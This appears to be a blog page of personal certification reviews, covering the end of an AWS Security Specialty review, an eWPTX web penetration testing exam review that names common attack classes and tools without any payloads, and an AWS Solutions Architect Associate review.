    As a Security specialist, I wanted to get this certification, and if you work with AWS regularly it would certainly be a good thing to do! I firmly believe that getting as many people certified in security as possible is one of the best ways to improve our collective defence against all kinds of threats, and if AWS is your thing this is a good way to go. If, however, you have little background in, or knowledge of, security, I feel this would be a very difficult certification to begin with. Even if you do work with AWS regularly, but don’t have your security fundamentals down it might pay dividends to start with something more general (like Security+) before taking on the AWS Security Specialist. For what it’s worth, I studied for about 2 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time and had a security background - I’d double that if you’re approaching it without much Security knowledge under your belt.

    Conclusion

    Studying for and taking the AWS Certified Security Specialist certification on was enjoyable and rewarding, even if the exam was a bit of a slog. The certification is a valuable and in-demand credential that demonstrates your skills in securing AWS infrastructure and services but, to be fair, it won’t make a massive contribution to your knowledge of Security outside of the AWS platform (then again, it isn’t really supposed to!).

  • Other

    Introduction

    Having completed several other certifications with eLearn Security (Now INE Security) I decided to challenge myself with the most difficult certification currently on offer in the offensive security path, the eWPTX. The exam was… “fiddly” - overall definitely one of the harder certifications I’ve gone for, however a lot of this was for all the wrong reasons. We’ll get to that shortly!

    Certification Overview

    According to INE “The eWPTX is our most advanced web application pentesting certification. The exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass.”

    By the specification, the exam tests:

    • Penetration testing processes and methodologies
    • Web application analysis and inspection
    • Advanced Reporting skills and Remediation
    • Advanced knowledge and abilities to bypass basics advanced XSS, SQLi, etc. filters
    • Advanced knowledge of different Database Management Systems
    • Ability to create custom exploits when modern tools fail

    INE offer formal training for this certification as part of their subscription service - I didn’t have access to this, but I’ve heard a lot of positive comments about the training experience. If you already have an INE subscription with access you’re in a great spot!

    In terms of structure, the eWPTX is similar to other INE Security exams - spin up your exam environment, conduct a pentest and present a commercial grade report. Meet all the listed criteria and write a professional report and you pass. For the eWPTX, there are several key “milestone” objectives which must be completed in order to pass, in addition to which you must find and report additional vulnerabilities not specifically listed in the letter of engagement.

    Study Resources

    Since I didn’t have access to the official course from INE, I used a combination of other resources to prepare around the topics which were listed for the exam, the most important ones included:

    • HackTheBox: At this point, HTB has content which can serve as training for almost any hacking exam! I spent time focusing on machines (usually with writeups to check my work) which featured typical web attacks (SQLi, SSTI, XXE, XSS, SSRF, CSRF etc.)

    • Vulnhub: Much less important to me these days since I find spinning up a box via HTB much easier, however, vuln hub boxes are still an excellent way to focus on the core attacks mentioned above

    • Portswigger Web Security Academy: From the folks who bring you Burpsuite, the Web Security Academy is well worth working through, and a great way to get more practice with Burp.

    Preparation Tips

    Without giving too much away, it’s fair to say that this exam is hard - however, it’s hard because it’s “fiddly”, not because the exploits are especially unusual or exotic. Therefore, if you have a good grasp of SQLi, SSTI, XXE, XSS, SSRF, CSRF etc. you have a good start. You will want to make use of automated tools on the exam (there’s no weird restrictions a ‘la OSCP) so do be sure to have plenty of practice with them too. Burpsuite or OWASP Zap is a must - you’ll also want to be comfortable with common web attack tools like SQLmap and Dirbuster (or similar).

    A big aspect of preparing for this one is the psychological game - I read quite a number of reviews up front and took on board that there may well be some instability in the environment as well as some exploits which needed firing a few times to work. What I didn’t really understand was that this meant that some payloads would work literally only once, then requiring a complete reset of the environment - this threw me on the exam and in a few places I was only able to move forward through throwing the same exploit again and again out of sheer frustration!

    Therefore, have uppermost in your mind:

    If you think you have found a vulnerability, and it looks exploitable IT SHOULD BE. There are no “rabbit holes” on this exam, so if it’s not working, just keep resetting the environment and re-sending the exploit until it works.

    Exam Experience

    As you may have sensed, I had a few issues with the exam experience - as many others have reported elsewhere.

    Let’s begin at the beginning - the process of getting a voucher, activating the exam and downloading the letter of engagement was all fine. As with all INE Security certifications, you can start this one whenever you like via the dashboard. The dashboard also allows you to generate a VPN config file and reset, stop and start your exam environment. This all worked fine and was a nice smooth experience.

    The lab itself - not quite so smooth! During previous INE Security certifications, I have experienced varying levels of connectivity problems - specifically the VPN would seem to randomly disconnect with the target hosts becoming unreachable, often without any actual error output from OpenVPN. The eWPTX was not terrible for this - but it wasn’t great either. I experienced one or two disconnects on most days, usually just requiring a restart of the OpenVPN process, but sometimes needing a lab reset. Overall manageable enough for the context, but certainly room for improvement.

    The biggest issue then - by far - was the instability of the critical exploits needed to pass the exam. As mentioned above, the exam is structured in such a way that besides the usual work of finding and documenting vulnerabilities you also must exploit certain paths. The major issue for this exam is that these essential exploits seem to behave erratically and inconsistently. Payloads that I confirmed to work on one try would often not work again - sometimes after an environment reset, they wouldn’t work at all. This leads to a situation where a candidate can be using exactly the right payload, but not actually getting a response - at the very least this is unfair and in my opinion, INE really need to address this. I think it’s fair to say that if I hadn’t already looked at a good number of reviews and prepared myself for a lot of issues with the “critical” exploits I would have given up!

    More broadly (and unlike other INE Security certifications) this one felt much more like a CTF than a pentest - personally that’s not my favourite “feel” to an exam - but it’s not excessive. The scenario feels contrived, but not ridiculous and there’s enough general context to make writing a sensible report more than doable. The flip side is that practising for the exam using HTB or similar CTF platforms is probably more applicable than it otherwise might be!

    Should I get this certification?

    I have always been a fan of the eLearn Security certifications - for the most part, they’re flexible, realistic and fair. The eWPTX wasn’t terrible, but it wasn’t quite up to the usual standard, and in addition, it was inconsistent and somewhat unstable. One major caveat to keep in mind is that I did not take the official training, and I wouldn’t be surprised if the official course had example payloads or a different approach to exploitation which may have worked better on the actual exam - nonetheless, a working exploit should always be a working exploit.

    If you have an INE subscription I’d say the eWPTX is a good goal to aim for - similarly, if you’re fairly confident with web exploits and have the fortitude to keep telling yourself “No, this should work!” you should be able to pass the exam. This being said, for those who have less experience, less confidence or just less patience, this might not be the best certification for you, at least in its current state.

    Conclusion

    The eWPTX is a good concept, but it’s crippled by technical issues and instability which make it borderline unfair. I wouldn’t be surprised to see INE update this certification in the near future, and I hope they do because there’s certainly a place for it in the market - right now it just needs a little love and a few updates.

  • Other

    Introduction

    After some years of working with AWS but not getting around to certifying, I recently decided to dive into AWS certification with what seems to be the most popular choice (At least for a first certification) - the AWS Certified Solutions Architect Associate. This is my quick review of the certification!

    Certification Overview

    The AWS Certified Solutions Architect – Associate certification is currently one of the most sought-after credentials for professionals who want to showcase their expertise in designing scalable and highly available AWS solutions, although I’m often sceptical of the validity of “Best Certification” lists, you see this one come up often enough to see that it’s certainly in demand. Per AWS, this certification “Showcases knowledge and skills in AWS technology, across a wide range of AWS services. The focus of this certification is on the design of cost and performance-optimized solutions, demonstrating a strong understanding of the AWS Well-Architected Framework” - I’d say that’s a fair description of what you’ll get out of studying for it!

    Overall the certification is essentially a sweep through the various services offered by AWS, with a focus on the Well-Architected Framework and cost optimisation. While this is definitely a step up from AWS Cloud Practitioner in terms of technical knowledge, you won’t need a deep understanding of IT infrastructure to pass this one. Knowledge at the CompTIA A+ / Net+ / Sec+ level should be enough if you’re after a rough benchmark.

    AWS states that “This exam does not require deep hands-on coding experience, although familiarity with basic programming concepts would be an advantage.” Truthfully, I’m not sure that any understanding of programming was really required here - familiarity with JSON and YAML is required for the exam but being able to read and understand the format was enough.

    Exam Details

    • Exam Title: AWS Certified Solutions Architect – Associate

    • Exam Code: SAA-C03

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 720 (on a scale of 100-1000)

    • Prerequisites: No formal prerequisites, but having some experience with AWS services is recommended

    • Exam Guide: AWS Certified Solutions Architect – Associate Exam Guide

    Exam Domains

    According to the specification, the AWS Solutions Architect Associate certification exam is divided into the following key domains:

    • Domain 1: Design Secure Architectures (30% of scored content)
    • Domain 2: Design Resilient Architectures (26% of scored content)
    • Domain 3: Design High-Performing Architectures (24% of scored content)
    • Domain 4: Design Cost-Optimized Architectures (20% of scored content)

    Overall I felt that this was an accurate representation of the actual question split on the exam, if anything cost optimisation featured a little more heavily than what felt like 20%.

    Study Resources

    Unlike many vendors (mentioning no names) AWS do provide a good variety of resources to help you study for the exam - on top of this there’s some excellent third party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d focus on the core documentation for the exam.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Free Official Practice Questions: AWS offer a free official practice exam (link below) - worth a look.
    • Official Practice Exam - Available as part of the skill builder subscription, I found this to be quite representative of the actual exam - better than most practice exams.
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You can test out 99% of the services on the exam for free as part of the free tier.

    You can find the complete list of official resources from Amazon here.

    Preparation Tips

    Being able to compare and contrast different AWS services is key for success here - therefore while you’ll want to get some hands-on time with the services (not least because this is the fun part), spending some time making lists and tables which allow you to memorise the key selling points for each service is also a valuable use of time. Many of the harder questions on the exam did require you to choose between two viable options within AWS, so understanding which products are cheaper, faster, more user friendly or come with better resiliency will help greatly here.

    As always, it’s a multiple-choice exam, so ensure that you’re doing plenty of practice with exam-style questions in the run-up to the test - being a wizard on the AWS platform won’t be enough to pass if you can’t work through the questions in the allotted time!

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward, all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score or even a pass/fail after the exam itself. I had to wait just over 24 hours for an email confirming I’d passed.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review. There were no especially hard or “unfair” feeling questions - certainly a few tricky ones but nothing way out of left field. I finished the exam with plenty of time remaining and didn’t feel any more rushed than the usual exam stress leaves you feeling!

    Should I get this certification?

    Overall I found the certification to be enjoyable and accessible, and I think most people would have this experience. Personally, I found this a great way to formalise my knowledge of AWS and to explore services which I wouldn’t normally use. What would vary based on your background might be time to complete. I studied for about 3 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time.

    If you have other cloud certifications this will be an exercise in learning how things are done on AWS, and if you’ve been using AWS for some time but don’t have a certification, it will be an exercise in exploring many of those services you’ve never looked at - neither of these would take especially long in my opinion, and if either of these describes you I think you’ll enjoy the certification.

    Those with a tech background but little to no experience in cloud computing may want to start with the Cloud Practitioner exam first - this is an easier introduction to the subject (and passing it will award you a 50% discount coupon for SAA, so you don’t lose out much financially). Failing that, getting familiar with the way that cloud “works” will take a bit of study and some lab time to get comfortable with some concepts, however, you’re unlikely to encounter anything especially mind-bending studying for the SAA, it’s more a case of translating your on-prem knowledge to a cloud model.

    If you’re just getting into the technology field, however, I’d strongly recommend the Cloud Practitioner exam first - this exam (and the free material available from AWS) is written very much for those just getting started - this would be the best place to start!

    It’s also worth mentioning that the three AWS Associate level exams (Architect, DevOps and SysOps) share a lot of common content, if you’re planning to take more than one, I’d recommend starting with the SAA - the high-level view it gives you is great framing for the other certs too.

    Conclusion

    Studying for and taking the AWS Certified Solutions Architect Associate certification was enjoyable and rewarding - the cert itself is a valuable and in-demand credential that demonstrates your skills in designing and implementing AWS architectures. Next up, I’ll look to take the AWS Security Specialism exam, which aligns more closely with my main interests and areas of work, but I’d agree with the many reviews and recommendations online that say SAA is an excellent starting point for getting your foot in the door with AWS.